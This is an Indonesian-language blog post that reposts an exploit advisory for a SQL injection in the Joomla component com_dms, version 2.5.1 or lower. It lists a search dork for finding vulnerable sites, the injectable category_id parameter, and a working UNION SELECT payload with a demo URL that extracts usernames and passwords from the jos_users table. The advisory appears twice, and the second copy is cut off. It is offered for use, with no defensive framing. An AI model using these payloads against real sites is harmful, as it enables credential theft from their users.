aditya mau berbagi sedikit .. tentang SQL injection
*************************************************************************/
[ Software Information ]
[+] Vendor : http://joomdonation.com/
[+] Info : http://joomdonation.com/index.php?option=com_content&view=article&id=41&Itemid=40
[+] version : 2.5.1 or lower maybe also affected
[+] Vulnerability : SQL injection
[+] Dork : inurl:"com_dms"
[+] Type : commercial
===========================================================================
[ Vulnerable File ]
http://server/index.php?option=com_dms&task=view_category&category_id=[INDONESIANCODER]
[ Exploit ]
-666+union+all+select+666,666,666,666,666,666,666,concat_ws(0x3a,username,password),666,666,666,666,666,6 66,666,666,666,666,666,666,666+from+jos_users--
[ Demo ]
http://server/ index.php?option=com_dms&task=view_category&category_id=-666+union+all+select+666,666,666,666,666,666,666, concat_ws(0x3a,username,password),666,666,666,666,666,666,666,666,666,666,666,666,666+from+jos_users--
===========================================================================Smoga mEmBantU Buat Ank" Manusia Biasa Team. :)
*************************************************************************/
[ Software Information ]
[+] Vendor : http://joomdonation.com/
[+] Info : http://joomdonation.com/index.php?option=com_content&view=article&id=41&Itemid=40
[+] version : 2.5.1 or lower maybe also affected
[+] Vulnerability : SQL injection
[+] Dork : inurl:"com_dms"
[+] Type : commercial
===========================================================================
[ Vulnerable File ]
http://server/index.php?option=com_dms&task=view_category&category_id=[INDONESIANCODER]
[ Exploit ]
-666+union+all+select+666,666,666,666,666,666,666,concat_ws(0x3a,username,password),666,666,666,666,666,6
[ Demo ]
http://server/
===========================================================================Smoga mEmBantU Buat Ank" Manusia Biasa Team. :)
0 komentar:
Posting Komentar